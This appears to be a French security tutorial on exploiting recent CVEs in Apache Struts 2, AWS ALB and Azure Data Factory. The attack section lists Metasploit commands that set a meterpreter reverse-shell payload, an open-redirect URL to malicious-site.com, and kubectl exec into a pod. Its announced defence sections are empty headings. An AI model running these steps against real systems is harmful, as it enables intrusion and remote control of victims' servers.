Exploitation des Dernières CVE sur Apache, AWS et Azure avec Metasploit 🛠️

Comprendre comment les attaquants exploitent des vulnérabilités récentes (CVE) sur Apache, AWS et Azure pour compromettre des systèmes critiques. Nous inclurons l’utilisation de Metasploit, des scripts Python, et des configurations d’environnements de test. Enfin, nous aborderons les mesures de défense à adopter pour sécuriser ces infrastructures.

Vulnérabilités Ciblées :

Partie 1 : Attaques

Étape 1 : Exploitation d’Apache Struts 2 avec Metasploit

msfconsole

Chargement du module pour CVE-2024-53677 :

search struts2

Configuration des paramètres :

set RHOSTS 
set RPORT 8080
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 
set LPORT 4444

Lancer l’attaque :

exploit

Étape 2 : Contournement AWS ALB avec Burp Suite

Configurez Burp Suite pour intercepter une requête vers un ALB vulnérable. Modifiez l’URL de redirection :

https:///login?redirect_uri=//malicious-site.com

Étape 3 : Compromission Azure Data Factory via Kubernetes RBAC

Exploration des permissions RBAC :

kubectl get clusterroles

Exécution de commandes malveillantes :

kubectl exec -it pod/airflow-pod -- /bin/bash

Partie 2 : Déploiement d’Environnements de Test

Partie 3 : Défenses

Apache Struts 2

AWS ALB

Azure Data Factory

Conclusion

Ce tutoriel fournit une approche exhaustive pour comprendre et tester les vulnérabilités récentes sur Apache, AWS et Azure, tout en explorant les méthodes d'attaque et les contre-mesures.